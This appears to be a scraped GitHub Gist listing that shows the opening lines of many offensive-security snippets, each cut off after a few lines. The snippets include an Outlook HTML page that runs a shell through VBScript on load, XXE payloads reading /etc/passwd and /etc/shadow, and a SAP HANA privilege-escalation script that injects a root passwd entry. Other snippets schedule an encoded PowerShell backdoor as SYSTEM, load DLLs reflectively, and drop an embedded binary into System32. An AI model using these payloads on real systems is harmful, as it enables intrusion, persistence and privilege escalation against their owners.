This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<meta http-equiv="Content-Language" content="en-us"> | |
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | |
<title>Outlook</title> | |
<script id=clientEventHandlersVBS language=vbscript> | |
<!-- | |
Sub window_onload() | |
Set Application = ViewCtl1.OutlookApplication | |
Set cmd = Application.CreateObject("Wscript.Shell") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, hexdump, binascii | |
from Crypto.Cipher import AES | |
class AESCipher: | |
def __init__(self, key): | |
self.key = key | |
def decrypt(self, iv, data): | |
self.cipher = AES.new(self.key, AES.MODE_CBC, iv) | |
return self.cipher.decrypt(data) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import signal | |
import sys | |
ATTEMPTS = (100 * 1000) | |
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher" | |
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher" | |
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$confirmpreference = "none" | |
function Get-ScheduledTaskSystem | |
{ | |
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function reflectit | |
{ | |
<# | |
.SYNOPSIS | |
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, | |
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, | |
please lead the Notes section (GENERAL NOTES) for information on how to use them. | |
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Ualapi | |
{ | |
Write-Host "Dropping ualapi.dll in System32 Folder..." | |
if ([Environment]::Is64BitProcess) | |
{ | |
[IO.File]::WriteAllBytes("C:\Windows\System32\ualapi.dll",[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADkY6HBoALPkqACz5KgAs+SFGjOk6ICz5IUaMqTsALPkhRoy5OpAs+SFGjMk6MCz5LFZM6TpwLPkqACzpLjAs+S1GnKk6ICz5LUac+ToQLPktRpMJKhAs+S1GnNk6ECz5JSaWNooALPkgAAAAAAAAAAAAAAAAAAAABQRQAAZIYKAMimf14AAAAAAAAAAPAAIiALAg4UAIgAAAB4AAAAAAAAehMBAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABgAgAABAAAAAAAAAMAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAMwBAJQBAADYEwIAZAAAAABAAgA8BAAAAOABAEwdAAAAAAAAAAAAAABQAgBoAAAAsLcBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwtwEACAEAAAAAAAAAAAAAABACANgDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dGJzcwAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADgLnRleHQAAAAThwAAABABAACIAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAlC0AAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function GetWinLogonTokenSystem | |
{ | |
function reflectbin | |
{ | |
<# | |
.SYNOPSIS | |
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, | |
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, |
OlderNewer